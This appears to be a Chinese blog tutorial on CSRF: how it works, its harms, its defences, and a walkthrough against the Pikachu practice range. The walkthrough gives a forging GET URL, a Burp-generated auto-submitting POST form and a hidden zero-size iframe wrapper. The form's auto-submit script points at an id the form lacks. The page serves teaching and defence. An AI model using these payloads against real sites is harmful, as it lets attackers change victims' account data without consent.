CSRF漏洞的原理、防御和比赛中的运用

CSRF

跨站请求伪造

原理

受害者登录到受信任的网站A(进行了身份验证并获取了会话 cookie),攻击者引导受害者访问恶意网站B(该网站是攻击者创建的一个恶意网站或在受害者访问的第三方网站上植入了恶意代码),然后恶意网站B发送请求到受信任的网站A(这是一个自动提交的请求,是去登录网站A的,可以是post,里面会有一些操作请求),因为用户已经登录了网站A,浏览器会自动附上相关的会话 cookie。网站A接收请求之后,认为是合法用户发出的,网站A在未验证请求来源的情况下执行了请求中的操作(请求中的操作不需要验证)。

如果某些操作请求是get传输,就不需要构造恶意网站B,直接让用户点网站A的操作请求链接就行

危害

以你的名义:

• 发邮件

• 发消息

• 修改个人信息

• 修改密码

• 财产操作比如转账,或者购买商品

防御

  1. Token验证

    是一个随机的验证码,是由服务器放在响应包里面发给用户的(用户登录消息发出去,服务器收到之后返回给浏览器的)抓包可以看到,每次会话都产生随机Token,浏览器要回复相同的Token才能继续会话

  2. 要有安全的会话管理

    登录超时限制;浏览器页面关闭时,自动退出登录

  3. 验证请求来源

    检查请求的 RefererOrigin 头,以确保请求来源于受信任的源站点。

  4. 两次身份认证

    在修改敏感信息(如密码)时,需要输入原密码或者验证码

比赛中的测试与攻击

条件

1)登录信任网站A,并在本地生成Cookie。

2)在不退出的情况下,访问危险网站B。

3)修改A的信息不需要验证码

打开 pichachu 靶场来到 csrf漏洞,输入用户登录后发现修改密码处没有任何验证,存在 csrf 攻击,通过 csrf 漏洞攻击修改资料。

get

攻击者: vince 123456

受害者:lili 123456

1)登录vince,点击修改信息,产生url

点提交的时候抓包,复制url

复制代码
http://192.168.xxx..xxx/06/vul/csrf/csrfget/csrf_get_edit.php?sex=11&phonenum=11&add=11&email=11&submit=submit

2)登录lili,让他点上面的网址,然后就自动修改信息

POST

攻击者: vince 123456

受害者:lili 123456

1)登录vince,点击修改信息,产生post数据包

2)生成自动登录的页面

将以下csrf.php文件放入公网服务器,让别人去访问

html 复制代码
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://192.168.xxx.xxx/06/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
      <input type="hidden" name="sex" value="aa" />
      <input type="hidden" name="phonenum" value="aa" />
      <input type="hidden" name="add" value="aa" />
      <input type="hidden" name="email" value="aa" />
      <input type="hidden" name="submit" value="submit" />
      <input type="submit" name="submit" value="submit"/>
    </form>
    <script type="text/javascript">
    		//页面加载时自动提交form表单
    		window.onload = function(){
    			document.getElementById('myform').click();
    		}
    </script>
  </body>
</html>

如果需要做隐藏,还要配合下面的文件使用,让用户去访问下面这个文件

html 复制代码
<html>
  <body>
    <img src="某个图片或者视频的网址">
    <iframe src="./csrf.php" width="0" height="0"></iframe>
  </body>
</html>

比赛中与xss连用

如果一个网站存在csrf和存储型xss,攻击者在修改信息那里,输入js脚本,然后产生url或者post包,伪造一个服务器连接,让受害者访问

相关推荐
xixingzhe29 小时前
SpringBoot + Nginx 免鉴权接口安全防护方案
运维·nginx·安全
中科岩创10 小时前
宁波某大学高支模施工安全监测实训模型应用
科技·物联网·安全·自动化
项目经理老王11 小时前
OpenClaw无捆绑安装包,安全纯净版AI助手部署
人工智能·安全
小李@Free2FA17 小时前
跨境卖家多平台二次验证统一管理
安全·外贸·2fa·二次验证
云祺vinchin18 小时前
混合云异构环境下的灾备实战:VMware+Hyper-V统一保护方案解析
安全·容灾备份·容灾备份体系
MartinYeung518 小时前
从注入攻击到诈骗:@martin_yeung/llm-up-guardrail 提供生产级 AI 安全防护
人工智能·安全
anbingsoft1219 小时前
企业加密软件软件有哪些?企业加密软件:让设计图纸安全无忧,年度热销
网络·安全·电脑
一楼的猫21 小时前
AI写作检测机制技术深度解析:200+维度检测、叙事指纹与网文AI辅助怎么过审
人工智能·学习·安全·chatgpt·ai写作
技术不好的崎鸣同学21 小时前
[极客大挑战 2019]EasySQL 思路及解法
网络·安全·web安全
Kyrie6781 天前
Januscape:潜伏 16 年的 KVM 虚拟机逃逸漏洞
安全·kvm